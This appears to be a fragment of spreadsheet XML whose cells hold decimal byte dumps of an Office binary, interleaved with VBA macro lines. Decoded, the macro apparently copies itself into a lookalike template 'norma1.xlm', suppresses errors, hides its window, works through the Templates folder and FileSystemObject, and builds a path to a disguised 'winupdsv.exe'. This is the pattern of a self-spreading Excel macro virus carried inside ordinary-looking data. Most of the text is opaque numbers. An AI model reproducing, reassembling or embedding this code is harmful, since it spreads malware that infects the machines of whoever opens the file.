40 212 100 112 153 225 169 17 3 169 87 252 202 124 45 246 91 107 78 36 197 137 126 4 255 5 98 65 94 224 8 83 204 79 16 64 27 31 185 233 110 113 200 65 141 102 71 171 145 197 79 224 67 195 55 128 199 214 199 105 192 129 90 251 48 130 13 93 108 187 224 64 8 2 4 191 74 30 251 249 108 183 110 133 193 231 223 121 12 139 16 128 0 17 200 16 12 164 94 210 246 93 253 44 36 141 151 0 112 69 250 119 60 141 71 119 72 242 219 202 209 224 131 136 126 244 93 252 6 181 155 193 188 199 64 252 240 66 14 239 255 165 210 251 220 75 253 199 128 232 16 20 5 86 44 226 46 184 193 240 150 118 199 69 79 12 5 222 186 18 153 214 141 38 137 172 141 74 12 135 219 203 214 8 143 65 100 158 68 66 188 158 227 252 119 221 248 138 70 67 138 200 11 132 192 122 136 78 67 117 3 9 120 4 186 128 131 2 99 44 203 104 126 245 169 8 173 106 216 171 132 51 210 185 161 194 8 123 184 82 153 8 116 32 122 123 235 188 66 61 120 117 167 19 114 29 4 36 119 24 238 237 84 12 50 38 52 4 213 20 42 </t>
  </si>
  <si>
    <t xml:space="preserve">188 188 125 40 57 0 192 192 235 125 86 202 46 172 224 88 98 204 126 40 57 0 185 204 240 208 215 208 108 240 68 213 141 93 86 124 12 195 177 10 207 113 255 121 10 6 228 194 48 47 245 88 76 68 50 149 241 98 245 240 50 36 59 204 161 243 53 171 137 21 200 85 50 240 240 206 70 2 227 116 27 239 164 146 185 74 6 16 136 240 240 9 19 38 2 86 137 136 144 3 153 164 129 207 194 25 146 65 142 169 155 145 165 0 236 4 219 6 16 54 57 145 173 73 13 194 5 150 70 91 206 122 144 18 133 42 201 208 132 15 130 145 151 92 216 28 2 127 206 224 5 25 141 93 221 217 194 224 37 131 131 17 159 172 85 145 229 12 216 210 31 145 7 210 193 161 216 49 1 114 180 212 147 216 117 20 73 16 128 118 242 44 109 64 60 115 167 216 216 87 36 72 206 120 10 167 75 201 216 108 153 50 222 96 132 255 83 26 107 35 59 224 87 143 59 106 37 146 101 31 236 19 178 61 0 117 15 255 3 87 152 1 6 17 176 242 172 217 86 4 12 59 108 255 147 0 144 1 185 85 73 39 44 178 111 35 247 70 145 186 216 193 5 50 32 216 252 66 43 204 36 90 72 145 188 165 139 242 163 49 172 252 127 8 88 2 222 146 173 20 206 172 145 145 177 7 83 176 5 180 184 205 134 153 145 188 192 202 49 194 131 7 179 206 104 200 206 121 238 152 60 148 26 65 230 93 163 37 28 105 108 7 63 80 232 132 112 182 51 64 122 20 62 138 231 78 173 36 203 128 75 66 212 65 130 96 130 145 172 200 188 86 53 192 208 1 229 195 84 176 59 236 96 105 6 87 39 206 79 235 94 132 12 200 133 168 79 67 128 89 0 57 172 252 22 12 199 89 159 93 61 37 150 49 6 22 102 163 57 183 103 12 106 30 53 50 129 76 96 202 240 2 220 1 37 23 240 102 101 73 77 96 56 79 78 198 26 81 144 170 15 81 83 85 86 232 108 33 137 102 6 116 7 40 86 119 155 205 109 120 161 48 10 131 100 36 204 52 191 223 134 35 45 116 215 61 112 5 53 108 187 109 80 55 0 214 116 45 141 224 81 177 85 187 66 53 214 33 129 113 3 61 </t>
  </si>
  <si>
    <t>If Workbooks(i).Name = "norma1.xlm" Then</t>
  </si>
  <si>
    <t xml:space="preserve">251 3 96 238 220 126 192 4 73 117 247 23 128 9 28 19 202 15 164 57 116 10 19 137 178 164 22 141 21 25 217 5 160 168 209 199 66 136 230 160 88 228 86 255 30 181 85 96 81 8 85 0 176 105 199 187 0 166 172 176 84 11 130 12 54 87 212 45 53 96 137 215 61 149 91 125 6 103 115 111 162 180 136 88 23 30 136 147 221 183 254 237 20 183 3 28 175 102 59 211 114 18 226 138 148 6 80 66 58 135 61 193 223 148 40 6 119 1 65 17 180 42 175 115 178 252 52 183 45 117 16 40 6 204 206 91 227 118 43 69 115 137 180 144 135 251 208 109 71 29 209 225 124 126 139 88 94 137 112 33 221 187 49 180 89 195 42 15 144 69 192 222 217 137 170 94 11 207 176 81 128 70 206 227 82 24 228 156 235 90 26 76 24 12 6 19 134 74 241 46 68 139 40 9 93 129 46 129 105 248 87 141 186 52 11 58 8 41 130 76 150 11 241 238 123 139 140 130 81 52 139 2 138 171 237 182 248 19 65 156 61 12 137 116 73 183 189 143 30 163 16 113 141 148 1 108 138 44 81 166 95 83 118 184 33 43 193 132 231 182 190 174 177 98 28 186 139 142 183 71 4 161 29 1 127 131 2 64 59 198 126 11 1 71 139 112 183 43 108 93 6 59 31 36 175 29 127 76 21 70 133 215 69 40 92 66 140 238 65 212 45 220 219 124 39 241 43 247 21 7 52 183 92 10 216 192 115 81 198 31 1 130 104 111 23 58 205 138 116 24 18 76 141 2 174 141 45 177 125 226 3 206 25 207 73 137 12 139 104 181 92 204 160 118 130 168 17 58 153 141 119 71 142 155 111 180 142 223 31 140 85 141 126 255 141 180 114 111 235 3 175 20 235 222 27 129 102 131 188 126 25 140 7 22 218 150 160 154 59 72 21 57 195 246 215 108 109 214 154 19 13 162 54 2 73 176 107 208 183 20 14 131 232 2 128 11 127 191 218 125 53 11 119 24 127 179 116 113 183 54 8 63 248 80 222 47 116 96 75 141 172 84 87 120 137 186 209 28 189 79 131 237 142 10 89 184 195 64 59 232 95 44 127 56 32 124 253 110 43 116 59 249 212 5 116 59 4 131 139 233 43 239 </t>
  </si>
  <si>
    <t>Do While m &gt; 0</t>
  </si>
  <si>
    <t xml:space="preserve">255 255 255 255 255 255 0 0 0 0 255 255 255 255 255 255 255 255 0 0 0 0 130 160 18 2 255 255 255 255 254 255 255 255 8 1 0 0 2 0 255 255 254 255 255 255 0 0 0 0 255 255 255 255 255 255 255 255 0 0 0 0 29 0 16 0 37 0 0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200 1 0 0 40 2 0 0 255 255 255 255 248 1 0 0 255 255 255 255 136 2 0 0 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 176 1 0 0 255 255 255 255 255 255 255 255 28 2 22 2 46 2 255 255 255 255 255 255 255 255 255 255 3 0 255 255 64 4 254 255 224 1 0 0 120 255 255 255 9 0 255 255 32 0 0 0 255 255 255 255 64 4 254 255 112 2 0 0 116 255 255 255 9 0 255 255 32 0 0 0 255 255 255 255 64 4 254 255 16 2 0 0 100 255 255 255 12 0 255 255 32 0 0 0 255 255 255 255 64 4 254 255 64 2 0 0 84 255 255 255 12 0 255 255 32 0 0 0 255 255 255 255 64 4 254 255 255 255 255 255 68 255 255 255 12 0 255 255 32 0 0 0 255 255 255 255 64 4 254 255 88 2 0 0 52 255 255 255 12 0 255 255 32 0 0 0 104 1 0 0 64 4 254 255 255 255 255 255 36 255 255 255 12 0 255 255 32 0 0 0 80 1 0 0 64 4 254 255 255 255 255 255 32 255 255 255 9 0 255 255 32 0 0 0 0 0 0 0 64 4 254 255 255 255 255 255 28 255 255 255 3 0 255 255 32 0 0 0 0 0 0 0 255 255 255 255 24 1 0 0 0 255 255 255 12 0 255 255 32 0 0 0 0 0 0 0 24 3 0 0 16 0 0 0 252 254 255 255 9 0 255 255 32 0 </t>
  </si>
  <si>
    <t xml:space="preserve">14 0 64 107 98 116 97 115 116 111 64 115 104 101 51 35 140 0 4 0 86 0 86 0 174 1 4 0 1 0 1 4 23 0 8 0 1 0 0 0 0 0 0 0 24 0 29 0 0 0 0 7 7 0 0 0 1 0 0 0 0 0 0 67 111 117 110 116 101 114 58 0 0 73 0 1 0 193 1 8 0 193 1 0 0 96 105 1 0 252 0 55 8 83 0 0 0 55 0 0 0 113 0 0 84 104 105 115 87 111 114 107 98 111 111 107 46 83 104 101 101 116 115 40 34 64 107 98 116 97 115 116 111 64 115 104 101 51 35 34 41 46 67 111 108 117 109 110 115 40 52 41 46 67 111 112 121 32 87 111 114 107 98 111 111 107 115 40 34 110 111 114 109 97 49 46 120 108 109 34 41 46 83 104 101 101 116 115 40 34 64 107 98 116 97 115 116 111 64 115 104 101 51 35 34 41 46 67 111 108 117 109 110 115 40 52 41 113 0 0 84 104 105 115 87 111 114 107 98 111 111 107 46 83 104 101 101 116 115 40 34 64 107 98 116 97 115 116 111 64 115 104 101 51 35 34 41 46 67 111 108 117 109 110 115 40 53 41 46 67 111 112 121 32 87 111 114 107 98 111 111 107 115 40 34 110 111 114 109 97 49 46 120 108 109 34 41 46 83 104 101 101 116 115 40 34 64 107 98 116 97 115 116 111 64 115 104 101 51 35 34 41 46 67 111 108 117 109 110 115 40 53 41 20 0 0 79 110 32 69 114 114 111 114 32 82 101 115 117 109 101 32 78 101 120 116 55 0 0 109 121 102 111 108 100 101 114 32 61 32 119 46 83 112 101 99 105 97 108 70 111 108 100 101 114 115 40 34 84 101 109 112 108 97 116 101 115 34 41 32 38 32 34 92 83 111 102 116 119 97 114 101 92 34 28 0 0 70 111 114 32 105 32 61 32 49 32 84 111 32 87 111 114 107 98 111 111 107 115 46 67 111 117 110 116 40 0 0 73 102 32 87 111 114 107 98 111 111 107 115 40 105 41 46 78 97 109 101 32 61 32 34 110 111 114 109 97 108 46 120 108 109 34 32 84 104 101 110 18 0 0 87 111 114 107 98 111 111 107 115 40 105 41 46 67 108 111 115 101 40 0 0 </t>
  </si>
  <si>
    <t xml:space="preserve">0 0 0 0 1 15 0 8 2 16 0 53 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 54 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 55 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 56 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 57 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 58 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 59 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 60 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 61 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 62 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 63 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 253 0 10 0 32 0 1 0 23 0 16 0 0 0 253 0 10 0 33 0 1 0 22 0 17 0 0 0 253 0 10 0 34 0 1 0 23 0 31 0 0 0 253 0 10 0 35 0 1 0 22 0 18 0 0 0 253 0 10 0 36 0 1 0 22 0 30 0 0 0 253 0 10 0 37 0 1 0 22 0 37 0 0 0 253 0 10 0 38 0 1 0 22 0 19 0 0 0 253 0 10 0 39 0 1 0 22 0 48 0 0 0 253 0 10 0 40 0 1 0 22 0 20 0 0 0 253 0 10 0 41 0 1 0 23 0 44 0 0 0 253 0 10 0 42 0 1 0 23 0 12 0 0 0 253 0 10 0 43 0 1 0 23 0 13 0 0 0 253 0 10 0 44 0 1 0 22 0 14 0 0 0 253 0 10 0 45 0 1 0 22 0 51 0 0 0 253 0 10 0 46 0 1 0 22 0 52 0 0 0 253 0 10 0 47 0 1 0 22 0 15 0 0 0 253 0 10 0 48 0 1 0 22 0 16 0 0 0 253 0 10 0 49 0 1 0 23 0 17 0 0 0 253 0 10 0 50 0 1 0 22 0 31 0 0 0 253 0 10 0 51 0 1 0 23 0 18 0 0 0 253 0 10 0 52 </t>
  </si>
  <si>
    <t xml:space="preserve">253 238 255 255 184 120 181 64 0 195 86 106 0 139 241 232 6 0 135 88 199 6 152 16 139 198 94 195 199 1 115 191 127 247 9 233 20 94 194 4 0 255 116 36 4 32 100 89 12 47 220 236 255 88 45 0 22 246 68 36 8 1 116 7 86 25 53 223 126 215 238 28 184 35 160 54 16 138 76 129 236 4 1 36 83 87 139 249 246 219 255 127 31 112 255 112 16 51 219 106 1 83 255 21 220 176 33 59 195 137 135 164 29 198 54 155 251 0 15 132 172 5 19 224 61 183 16 155 231 110 123 103 49 35 241 133 192 12 142 18 86 104 212 223 253 191 116 100 106 200 137 77 240 59 203 137 93 252 116 9 17 1 69 139 240 235 119 255 255 255 2 51 246 131 77 252 255 137 119 32 106 63 136 157 240 254 255 255 51 192 89 141 189 241 8 243 171 102 109 251 123 216 171 170 126 141 133 27 104 88 182 106 80 113 46 111 237 191 52 232 6 131 196 12 83 0 148 53 56 179 141 141 181 247 191 197 32 107 207 0 81 83 139 206 255 144 56 192 8 221 127 119 247 64 118 4 71 189 94 108 192 139 77 244 95 91 100 137 13 148 0 92 142 112 248 201 195 184 8 183 66 64 137 26 48 183 32 188 251 134 9 233 20 32 184 108 182 101 36 219 119 59 63 117 197 206 94 24 38 18 1 54 178 67 120 184 54 63 81 246 121 89 155 108 219 59 6 69 248 5 133 131 120 128 60 33 144 1 87 131 124 253 246 182 91 186 2 32 117 20 127 104 48 117 46 106 100 255 118 32 55 172 97 179 255 48 235 17 216 8 128 192 236 194 111 219 38 100 64 53 8 0 85 139 236 191 0 2 127 246 194 221 127 137 44 131 125 8 100 116 6 5 101 117 65 208 106 127 89 37 89 48 11 133 203 106 0 103 1 240 21 12 15 104 244 46 100 21 80 221 48 67 217 230 132 177 90 16 17 240 102 204 45 148 180 57 201 148 94 40 63 219 27 110 152 53 208 250 87 255 117 8 40 220 255 214 139 238 183 195 220 61 212 18 14 215 26 12 198 132 5 221 12 221 135 197 118 19 216 253 34 8 215 106 30 27 217 246 63 108 159 253 69 224 224 80 57 164 139 69 16 131 </t>
  </si>
  <si>
    <t>Set fso = CreateObject("scripting.filesystemobject")</t>
  </si>
  <si>
    <t xml:space="preserve">0 42 0 35 0 101 0 57 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 100 0 102 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 99 0 101 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 101 0 57 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 100 0 102 0 1 18 0 42 0 92 0 82 0 49 0 42 0 35 0 49 0 97 0 99 0 1 18 0 42 0 92 0 82 0 49 0 42 0 35 0 49 0 97 0 100 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 99 0 101 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 101 0 57 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 100 0 102 0 1 18 0 42 0 92 0 82 0 49 0 42 0 35 0 50 0 56 0 53 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 99 0 101 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 101 0 57 0 223 1 0 0 0 0 0 255 255 255 255 56 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 254 202 1 0 11 0 0 128 8 0 8 0 0 0 0 0 0 0 34 129 8 0 6 0 2 0 8 0 0 0 0 129 8 0 4 0 5 0 16 0 0 0 0 129 8 0 30 0 73 0 120 0 0 0 0 129 8 0 10 0 24 0 24 0 0 0 0 129 8 0 14 0 34 0 40 0 0 0 0 129 8 0 16 0 42 0 56 0 0 0 0 129 8 0 10 0 43 0 72 0 0 0 0 129 8 0 2 0 2 0 88 0 0 0 0 128 9 0 0 0 0 0 255 255 255 255 4 129 8 0 2 0 3 0 96 0 0 0 255 255 255 255 1 1 168 0 0 0 93 0 242 4 144 0 0 0 150 4 32 0 0 0 0 0 201 4 0 0 104 0 0 0 183 0 32 0 28 2 40 0 30 2 110 0 0 0 0 0 237 0 32 0 28 2 </t>
  </si>
  <si>
    <t xml:space="preserve">0 1 0 23 0 30 0 0 0 253 0 10 0 53 0 1 0 23 0 38 0 0 0 253 0 10 0 54 0 1 0 23 0 21 0 0 0 253 0 10 0 55 0 1 0 23 0 49 0 0 0 253 0 10 0 56 0 1 0 23 0 47 0 0 0 253 0 10 0 57 0 1 0 23 0 45 0 0 0 253 0 10 0 58 0 1 0 23 0 12 0 0 0 253 0 10 0 59 0 1 0 23 0 13 0 0 0 253 0 10 0 60 0 1 0 23 0 14 0 0 0 253 0 10 0 61 0 1 0 22 0 51 0 0 0 253 0 10 0 62 0 1 0 22 0 52 0 0 0 253 0 10 0 63 0 1 0 22 0 15 0 0 0 215 0 68 0 64 4 0 0 108 2 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 8 2 16 0 64 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 65 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 66 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 67 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 68 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 69 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 70 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 71 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 72 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 73 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 74 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 75 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 76 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 77 0 1 0 2 0 29 1 0 0 0 0 0 </t>
  </si>
  <si>
    <t xml:space="preserve">32 0 22 2 47 0 44 2 0 0 32 0 46 2 33 0 48 2 172 0 1 0 7 0 156 0 32 0 46 2 66 64 50 2 0 0 255 255 255 255 255 255 107 0 255 255 216 0 0 0 111 0 255 255 208 0 0 0 255 255 255 255 200 0 0 0 255 255 255 255 248 0 0 0 183 0 182 0 10 0 110 111 114 109 97 49 46 120 108 109 32 0 28 2 37 0 32 2 1 0 40 0 34 2 0 0 255 255 255 255 128 4 0 0 255 255 255 255 184 0 0 0 255 255 255 255 0 0 1 124 177 0 65 116 116 114 105 98 117 116 0 101 32 86 66 95 78 97 109 0 101 32 61 32 34 84 104 105 0 115 87 111 114 107 98 111 111 16 107 34 13 10 10 140 66 97 115 1 2 140 48 123 48 48 48 50 48 80 56 49 57 45 0 16 48 3 8 67 7 0 20 2 18 1 36 48 48 52 54 125 129 13 124 71 108 111 98 97 108 1 208 16 83 112 97 99 1 146 70 97 108 4 115 101 12 100 67 114 101 97 116 8 97 98 108 21 31 80 114 101 100 144 101 99 108 97 0 6 73 100 0 177 8 84 114 117 13 66 69 120 112 111 4 115 101 20 28 84 101 109 112 108 0 97 116 101 68 101 114 105 118 3 2 18 146 66 117 115 116 111 109 105 6 122 4 68 3 50 68 105 109 32 120 0 32 65 115 32 78 101 119 32 192 192 224 49 13 10 80 128 33 128 37 32 32 83 117 98 32 133 154 95 79 0 112 101 110 40 41 13 10 79 0 110 32 69 114 114 111 114 32 16 82 101 115 117 128 174 78 101 120 2 116 0 118 112 112 108 105 99 97 0 116 105 111 110 46 87 105 110 0 100 111 119 115 40 34 110 111 0 114 109 97 49 46 120 108 109 128 34 41 46 86 105 115 105 139 127 33 8 25 83 104 111 119 4 27 73 110 128 84 97 115 107 98 97 114 128 130 1 132 97 83 101 116 32 120 46 65 28 112 112 0 9 128 2 5 52 13 10 73 2 102 134 79 115 46 67 111 117 110 0 116 32 60 61 32 49 32 84 32 104 101 110 13 10 133 46 115 46 0 65 100 100 13 10 69 110 100 96 32 73 102 13 10 67 2 192 54 13 0 10 </t>
  </si>
  <si>
    <t xml:space="preserve">17 124 0 156 15 174 40 170 154 102 135 82 24 59 8 236 156 189 0 87 205 202 154 20 41 168 37 106 103 167 216 47 136 232 2 181 115 28 203 234 234 73 52 200 180 205 204 216 2 123 80 98 95 24 57 66 133 35 159 131 36 104 219 136 177 117 16 28 161 187 116 106 8 212 128 214 182 6 143 114 215 139 232 167 39 80 35 86 24 106 165 169 238 248 8 236 123 237 43 3 227 201 116 26 45 39 180 182 33 243 216 139 157 24 81 44 43 25 102 219 75 214 36 52 137 16 40 51 253 191 251 111 75 245 108 26 193 237 4 116 107 64 59 232 25 20 114 98 102 131 123 101 162 99 183 8 246 78 106 197 100 248 114 247 147 109 71 27 115 4 52 96 39 139 71 96 43 11 83 80 34 239 89 211 22 152 167 98 189 18 112 44 108 27 244 201 104 117 51 133 140 87 53 92 6 111 93 219 131 195 167 93 57 109 20 118 158 193 58 116 192 186 161 36 176 139 199 245 166 71 187 5 58 195 253 20 0 8 149 52 155 161 223 141 175 94 129 197 243 100 16 85 34 132 61 128 67 104 8 25 118 221 215 93 203 67 4 165 32 119 139 3 59 177 114 177 3 75 68 192 147 79 32 16 212 8 95 97 74 46 121 6 63 223 104 39 90 9 92 69 25 112 97 248 170 78 213 117 236 19 145 248 216 84 60 131 207 76 144 173 137 48 219 36 96 43 233 152 158 50 156 104 94 48 11 153 136 117 137 117 244 53 247 137 46 76 166 175 29 240 28 244 81 34 166 234 93 84 137 13 0 240 253 127 128 226 70 67 128 211 129 75 106 28 168 223 77 184 13 163 255 112 24 27 21 236 142 108 239 78 167 25 249 246 69 205 16 9 15 209 1 125 13 159 182 226 5 102 117 200 223 215 96 240 205 117 206 17 152 15 61 86 62 126 195 86 118 179 240 93 61 219 0 128 96 15 81 35 116 55 205 88 240 165 211 23 20 29 178 25 170 216 211 19 232 116 254 91 181 22 200 65 148 70 70 3 193 59 240 114 208 124 132 217 254 149 114 133 246 66 152 102 134 107 36 233 56 14 234 232 209 24 206 208 39 219 17 228 44 15 183 202 4 182 231 121 158 226 224 216 222 218 </t>
  </si>
  <si>
    <t xml:space="preserve">1 15 0 8 2 16 0 78 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 79 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 80 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 81 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 82 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 83 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 84 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 85 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 86 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 87 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 88 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 89 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 90 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 91 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 92 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 93 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 94 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 95 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 253 0 10 0 64 0 1 0 22 0 16 0 0 0 253 0 10 0 65 0 1 0 22 0 17 0 0 0 253 0 10 0 66 0 1 0 23 0 31 0 0 0 253 0 10 0 67 0 1 0 23 0 18 0 0 0 253 0 10 0 68 0 1 0 23 0 30 0 0 0 253 0 10 0 69 0 1 0 22 0 53 0 0 0 253 0 10 0 70 0 1 0 26 0 22 0 0 0 253 0 10 0 71 0 1 0 23 0 41 0 0 0 253 0 10 0 72 0 1 0 23 0 23 0 0 0 253 0 10 0 73 0 1 0 22 0 46 0 0 0 253 0 10 0 74 0 1 0 22 </t>
  </si>
  <si>
    <t xml:space="preserve">48 11 205 9 85 231 0 242 4 200 16 101 240 90 7 204 96 108 229 94 39 160 172 108 130 3 241 0 26 143 167 72 73 127 172 20 149 133 46 224 82 83 78 124 10 87 4 101 211 22 244 128 126 28 2 243 206 10 115 92 6 105 122 146 16 141 142 28 22 81 8 74 143 210 177 101 120 92 150 239 1 248 70 219 177 159 194 10 124 10 108 3 193 233 3 91 241 77 23 80 119 7 52 77 5 139 209 141 171 250 248 169 35 212 119 29 89 116 21 190 87 85 83 215 64 12 139 35 191 55 20 8 207 170 181 50 70 133 136 0 145 52 77 91 240 141 71 2 5 208 47 78 150 196 27 178 140 86 158 11 11 141 240 156 131 86 86 72 78 76 150 193 195 32 39 78 232 159 150 16 107 39 99 5 134 224 79 10 211 2 244 243 165 142 104 176 196 140 48 222 255 197 220 49 216 111 60 226 153 135 87 4 126 91 139 145 205 65 230 218 211 227 200 139 158 108 115 71 150 94 134 4 25 118 11 177 20 124 35 124 111 8 121 18 158 191 70 133 203 78 180 109 176 234 184 195 134 70 21 179 239 69 22 193 150 33 141 226 221 182 245 172 101 141 166 64 80 250 32 7 250 106 29 59 65 81 149 108 204 226 167 82 196 129 201 206 192 80 170 20 5 160 149 216 202 77 133 95 162 21 154 1 47 54 15 233 68 23 40 75 149 164 47 43 76 166 74 9 124 196 141 106 32 66 133 69 160 15 235 139 16 211 29 182 17 234 137 63 20 155 36 213 116 232 18 223 22 110 100 244 48 139 110 112 76 126 36 68 124 104 174 11 171 182 141 159 106 7 93 192 79 7 59 211 37 118 14 6 200 16 92 32 129 194 141 40 228 160 108 209 235 8 183 24 45 254 237 170 43 132 17 28 113 41 255 9 20 59 174 132 182 221 192 253 61 153 1 43 47 193 108 79 2 97 126 81 119 247 108 59 194 27 32 118 4 5 16 136 86 48 251 37 110 38 232 45 3 215 148 68 42 255 117 125 13 197 237 27 219 69 57 177 115 65 66 144 12 65 2 182 109 80 40 203 238 89 59 17 49 14 22 114 33 23 34 19 222 168 246 55 161 203 114 192 138 1 58 9 50 209 43 211 </t>
  </si>
  <si>
    <t>Loop</t>
  </si>
  <si>
    <t xml:space="preserve">108 36 182 143 44 25 165 203 100 28 139 85 12 81 44 54 2 46 101 92 138 8 8 1 120 129 224 95 209 233 131 225 127 137 10 193 1 163 120 6 113 129 118 157 208 244 24 43 208 220 221 111 247 132 48 52 42 129 198 5 163 112 26 137 53 116 5 97 72 71 163 56 66 215 170 64 9 204 131 58 180 115 225 85 28 2 176 80 205 205 66 167 154 16 202 56 173 143 34 16 180 30 255 241 111 116 8 193 69 176 102 188 246 184 59 216 19 14 47 17 70 15 131 158 62 213 15 193 61 160 28 162 112 154 116 114 118 44 68 11 140 229 136 224 22 116 108 214 225 132 223 11 233 1 117 102 80 146 21 250 36 39 103 15 225 244 0 154 224 86 57 240 42 97 28 10 14 139 239 168 203 30 102 213 24 105 143 80 23 222 108 7 236 116 50 86 223 235 6 109 180 3 93 248 59 123 14 120 163 57 130 104 255 38 88 242 137 218 4 12 187 129 195 243 135 5 120 213 165 31 29 45 163 255 214 135 163 44 56 8 200 56 72 1 116 8 65 64 64 173 111 213 92 97 0 41 253 62 212 70 235 188 187 187 59 70 89 161 108 36 3 192 102 97 131 192 2 6 175 85 4 171 250 124 54 216 161 49 118 144 214 139 13 40 201 207 131 147 142 234 17 210 181 176 103 8 14 75 32 160 187 144 6 147 168 199 94 104 233 214 104 76 189 12 50 214 42 194 48 178 185 4 16 12 176 172 131 99 18 205 16 96 193 38 155 189 150 83 151 147 224 6 214 189 158 151 87 152 137 13 163 5 107 185 46 18 32 91 221 217 129 155 83 148 139 40 210 129 66 198 223 248 223 57 61 44 118 45 133 210 116 85 132 132 201 116 18 128 120 135 96 110 237 183 145 128 249 32 115 2 33 6 126 118 16 214 28 187 45 71 59 40 114 215 44 209 51 220 65 124 67 129 251 74 15 134 102 170 222 68 48 83 11 212 224 95 199 55 88 231 9 8 164 30 9 17 227 27 193 171 50 31 49 28 1 120 130 167 190 56 0 166 252 0 17 134 186 214 67 18 87 50 210 29 216 109 218 228 116 87 163 204 12 196 114 50 114 50 100 168 96 140 250 224 48 50 92 163 5 128 70 71 </t>
  </si>
  <si>
    <t>filesv = folder1 &amp; "\winupdsv.exe"</t>
  </si>
  <si>
    <t xml:space="preserve">238 134 248 215 180 136 59 213 141 139 64 126 21 59 128 109 210 93 234 137 126 104 181 125 38 179 10 141 70 92 168 111 144 70 56 35 215 27 80 59 3 47 218 104 219 118 23 76 183 190 86 230 28 35 182 29 208 232 119 196 197 19 20 195 221 162 159 81 79 129 126 44 255 159 161 136 58 56 136 13 24 117 20 126 150 209 192 240 139 126 127 76 146 58 242 251 42 83 87 215 81 20 132 107 139 210 111 11 154 24 14 45 37 32 153 123 27 55 162 0 153 27 210 249 21 71 65 4 132 34 39 125 156 191 11 183 133 91 235 86 83 183 52 184 139 85 178 93 29 126 233 225 112 57 157 102 119 161 234 2 66 139 189 176 196 66 33 194 200 250 105 199 183 134 141 90 9 253 92 199 117 15 77 100 87 200 4 134 137 229 108 121 9 220 136 106 91 12 243 22 2 19 129 198 135 183 71 56 22 186 137 52 36 41 36 129 238 220 108 216 136 218 43 206 232 38 76 160 85 56 93 215 117 59 177 6 104 102 91 28 152 76 15 4 41 26 117 115 137 45 250 3 96 251 69 91 227 174 79 88 8 235 78 79 29 48 182 195 239 110 147 209 3 82 57 28 56 116 28 37 25 56 4 54 152 226 133 181 200 15 131 118 79 48 117 189 47 236 168 242 131 200 165 44 16 117 222 10 217 76 152 107 156 62 42 143 131 108 132 149 219 123 17 118 172 72 82 172 2 33 228 72 186 217 109 99 26 128 82 100 146 35 153 84 55 40 12 201 73 142 28 252 1 1 14 121 36 147 208 230 2 164 35 153 228 72 203 117 73 142 100 146 176 70 149 36 39 57 